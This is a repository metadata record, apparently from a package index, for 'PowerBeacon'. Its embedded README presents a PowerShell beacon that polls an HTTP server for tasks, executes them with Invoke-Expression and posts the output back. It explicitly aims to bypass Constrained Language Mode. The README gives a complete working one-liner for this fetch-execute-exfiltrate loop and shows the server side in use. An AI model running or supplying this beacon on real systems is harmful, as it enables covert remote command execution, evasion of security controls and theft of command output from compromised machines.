{"id":15064078,"url":"https://github.com/redh00k-k/powerbeacon","last_synced_at":"2026-02-06T17:35:37.199Z","repository":{"id":254142699,"uuid":"844601133","full_name":"Redh00k-k/PowerBeacon","owner":"Redh00k-k","description":"Simple script of reading and execute command from http in PowerShell (and bypass CLM: Constrained Language Mode).","archived":false,"fork":false,"pushed_at":"2024-08-24T02:49:41.000Z","size":4,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-15T20:23:29.049Z","etag":null,"topics":["beacon","bypass-clm","powershell"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Redh00k-k.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-08-19T15:35:09.000Z","updated_at":"2024-08-24T02:49:43.000Z","dependencies_parsed_at":"2024-08-24T03:38:59.546Z","dependency_job_id":null,"html_url":"https://github.com/Redh00k-k/PowerBeacon","commit_stats":null,"previous_names":["redh00k-k/powerbeacon"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Redh00k-k/PowerBeacon","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Redh00k-k%2FPowerBeacon","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Redh00k-k%2FPowerBeacon/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Redh00k-k%2FPowerBeacon/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Redh00k-k%2FPowerBeacon/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Redh00k-k","download_url":"https://codeload.github.com/Redh00k-k/PowerBeacon/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Redh00k-k%2FPowerBeacon/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":262854783,"owners_count":23375191,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["beacon","bypass-clm","powershell"],"created_at":"2024-09-25T00:11:17.211Z","updated_at":"2026-02-06T17:35:37.163Z","avatar_url":"https://github.com/Redh00k-k.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PowerBeacon\nThis is simple script of reading and execute command from a http in PowerShell.\n\n# Usage\n## Server\n```\n$ cat tasks\necho test\nwhoami\n\n$ python3 server.py -i 127.0.0.1 -p 8888 \nServing HTTP on :: port 8888 ...\n\n# Client accesss and execute the contents of /tasks. The result is forwarded to the server.\n127.0.0.1 - - [20/Aug/2024 00:00:10] \"GET /tasks.txt HTTP/1.1\" 200 -\n127.0.0.1 - - [20/Aug/2024 00:00:10] \"POST / HTTP/1.1\" 200 -\ntest\nMyPC\\User\n```\n\n## Client\n```\nPS \u003e beacon_http.ps1 \u003cServer IP address:port\u003e \u003cPolling interval\u003e\n```\n\nIf you want to run in CLM(Constratined Langage Mode), use 'beacon_oneliner.ps1'\n```\nPS \u003e while ($true) {$url=\"http://127.0.0.1:8888\";$response = Invoke-WebRequest -Uri $($url + \"/tasks.txt\");$results = Invoke-Expression $response.Content;Invoke-WebRequest -Method Post -Uri $url -Body $($results -join \"`n\") -ContentType \"application/text\" \u003e $null ;Start-Sleep -Seconds 10}\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fredh00k-k%2Fpowerbeacon","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fredh00k-k%2Fpowerbeacon","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fredh00k-k%2Fpowerbeacon/lists"}